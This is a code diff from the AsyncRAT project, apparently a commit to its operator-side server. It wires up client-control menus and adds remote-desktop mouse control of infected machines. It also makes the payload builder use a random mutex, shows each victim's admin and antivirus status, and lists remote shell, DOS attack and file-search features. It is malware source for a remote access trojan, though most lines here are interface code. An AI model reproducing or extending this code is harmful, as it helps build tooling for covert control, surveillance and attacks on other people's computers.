this.updateToolStripMenuItem2.Text = "Update";
this.updateToolStripMenuItem2.Click += new System.EventHandler(this.UpdateToolStripMenuItem2_Click);
//
// uninstallToolStripMenuItem
//
this.uninstallToolStripMenuItem.Name = "uninstallToolStripMenuItem";
this.uninstallToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.uninstallToolStripMenuItem.Text = "Uninstall";
this.uninstallToolStripMenuItem.Click += new System.EventHandler(this.UninstallToolStripMenuItem_Click);
//
// toolStripSeparator3
//
this.toolStripSeparator3.Name = "toolStripSeparator3";
this.toolStripSeparator3.Size = new System.Drawing.Size(267, 6);
//
// showFolderToolStripMenuItem
//
this.showFolderToolStripMenuItem.Name = "showFolderToolStripMenuItem";
this.showFolderToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.showFolderToolStripMenuItem.Text = "Show Folder";
this.showFolderToolStripMenuItem.Click += new System.EventHandler(this.ShowFolderToolStripMenuItem_Click);
//
// clientToolStripMenuItem
//
this.clientToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.closeToolStripMenuItem1,
this.restartToolStripMenuItem2,
this.updateToolStripMenuItem2,
this.uninstallToolStripMenuItem,
this.toolStripSeparator3,
this.showFolderToolStripMenuItem});
this.clientToolStripMenuItem.Image = global::Server.Properties.Resources.client;
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
this.clientToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.clientToolStripMenuItem.Text = "Client";
//
// Form1
//
@ -1098,18 +1098,8 @@
private System.Windows.Forms.ToolStripMenuItem runToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem stopToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem systemToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem clientToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem restartToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem closeToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem updateToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem uninstallToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem pCToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem logoffToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem restartToolStripMenuItem3;
private System.Windows.Forms.ToolStripMenuItem shutdownToolStripMenuItem1;
private System.Windows.Forms.ToolStripSeparator toolStripSeparator1;
private System.Windows.Forms.ToolStripSeparator toolStripSeparator3;
private System.Windows.Forms.ToolStripMenuItem showFolderToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem seedTorrentToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem remoteShellToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem dOSAttackToolStripMenuItem;
@ -1135,6 +1125,16 @@
private System.Windows.Forms.ToolStripMenuItem setWallpaperToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem filesSearcherToolStripMenuItem;
private System.Windows.Forms.ColumnHeader lv_group;
private System.Windows.Forms.ToolStripMenuItem clientToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem closeToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem restartToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem updateToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem uninstallToolStripMenuItem;
private System.Windows.Forms.ToolStripSeparator toolStripSeparator3;
private System.Windows.Forms.ToolStripMenuItem showFolderToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem logoffToolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem restartToolStripMenuItem3;
private System.Windows.Forms.ToolStripMenuItem shutdownToolStripMenuItem1;
}
}

4
AsyncRAT-C#/Server/Forms/FormBuilder.Designer.cs generated
View File

@ -371,7 +371,7 @@ namespace Server.Forms
0,
0});
this.numDelay.Minimum = new decimal(new int[] {
1,
3,
0,
0,
0});
@ -379,7 +379,7 @@ namespace Server.Forms
this.numDelay.Size = new System.Drawing.Size(84, 26);
this.numDelay.TabIndex = 15;
this.numDelay.Value = new decimal(new int[] {
1,
3,
0,
0,
0});

2
AsyncRAT-C#/Server/Forms/FormBuilder.cs
View File

@ -94,6 +94,8 @@ namespace Server.Forms
}
}
catch { }
txtMutex.Text = getRandomCharacters();
}

1
AsyncRAT-C#/Server/Forms/FormRemoteDesktop.Designer.cs generated
View File

@ -60,6 +60,7 @@
this.pictureBox1.TabIndex = 0;
this.pictureBox1.TabStop = false;
this.pictureBox1.MouseDown += new System.Windows.Forms.MouseEventHandler(this.PictureBox1_MouseDown);
this.pictureBox1.MouseMove += new System.Windows.Forms.MouseEventHandler(this.pictureBox1_MouseMove);
this.pictureBox1.MouseUp += new System.Windows.Forms.MouseEventHandler(this.PictureBox1_MouseUp);
//
// timer1

36
AsyncRAT-C#/Server/Forms/FormRemoteDesktop.cs
View File

@ -226,23 +226,23 @@ namespace Server.Forms
catch { }
}
//private void PictureBox1_MouseMove(object sender, MouseEventArgs e)
//{
// try
// {
// if (pictureBox1.Image != null && this.ContainsFocus && isMouse)
// {
// Point p = new Point(e.X * (rdSize.Width / pictureBox1.Width), e.Y * (rdSize.Height / pictureBox1.Height));
// MsgPack msgpack = new MsgPack();
// msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
// msgpack.ForcePathObject("Option").AsString = "mouseMove";
// msgpack.ForcePathObject("X").AsInteger = (Int32)(p.X);
// msgpack.ForcePathObject("Y").AsInteger = (Int32)(p.Y);
// ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
// }
// }
// catch { }
//}
private void pictureBox1_MouseMove(object sender, MouseEventArgs e)
{
try
{
if (pictureBox1.Image != null && this.ContainsFocus && isMouse)
{
Point p = new Point(e.X * (rdSize.Width / pictureBox1.Width), e.Y * (rdSize.Height / pictureBox1.Height));
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("Option").AsString = "mouseMove";
msgpack.ForcePathObject("X").AsInteger = p.X;
msgpack.ForcePathObject("Y").AsInteger = p.Y;
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
}
}
catch { }
}
private void Button3_Click(object sender, EventArgs e)
{
@ -332,5 +332,7 @@ namespace Server.Forms
|| ((key & Keys.NumLock) == Keys.NumLock)
|| ((key & Keys.Scroll) == Keys.Scroll);
}
}
}

9
AsyncRAT-C#/Server/Handle Packet/HandleListView.cs
View File

@ -79,7 +79,14 @@ namespace Server.Handle_Packet
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Antivirus").AsString);
client.LV.SubItems.Add("0000 MS");
client.LV.SubItems.Add("...");
try
{
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
}
catch
{
client.LV.SubItems.Add("...");
}
client.LV.ToolTipText = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + Environment.NewLine;
client.LV.ToolTipText += "[Pastebin] " + unpack_msgpack.ForcePathObject("Pastebin").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;

8
AsyncRAT-C#/Server/Handle Packet/HandlePing.cs
View File

@ -4,6 +4,7 @@ using System.Diagnostics;
using System.Windows.Forms;
using System.Threading;
using System.Drawing;
using Microsoft.VisualBasic;
namespace Server.Handle_Packet
{
@ -32,12 +33,13 @@ namespace Server.Handle_Packet
lock (Settings.LockListviewClients)
if (client.LV != null)
{
client.LV.SubItems[Program.form1.lv_ping.Index].Text = unpack_msgpack.ForcePathObject("Message").AsInteger.ToString() + " MS";
if (unpack_msgpack.ForcePathObject("Message").AsInteger > 600)
int interval = (int)unpack_msgpack.ForcePathObject("Message").AsInteger;
client.LV.SubItems[Program.form1.lv_ping.Index].Text = interval + " MS";
if (interval > 400)
{
client.LV.SubItems[Program.form1.lv_ping.Index].ForeColor = Color.Red;
}
else if (unpack_msgpack.ForcePathObject("Message").AsInteger > 300)
else if (interval > 200)
{
client.LV.SubItems[Program.form1.lv_ping.Index].ForeColor = Color.Orange;
}

2
AsyncRAT-C#/Server/Settings.cs
View File

@ -19,7 +19,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.7A";
public static readonly string Version = "AsyncRAT 0.5.7B";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();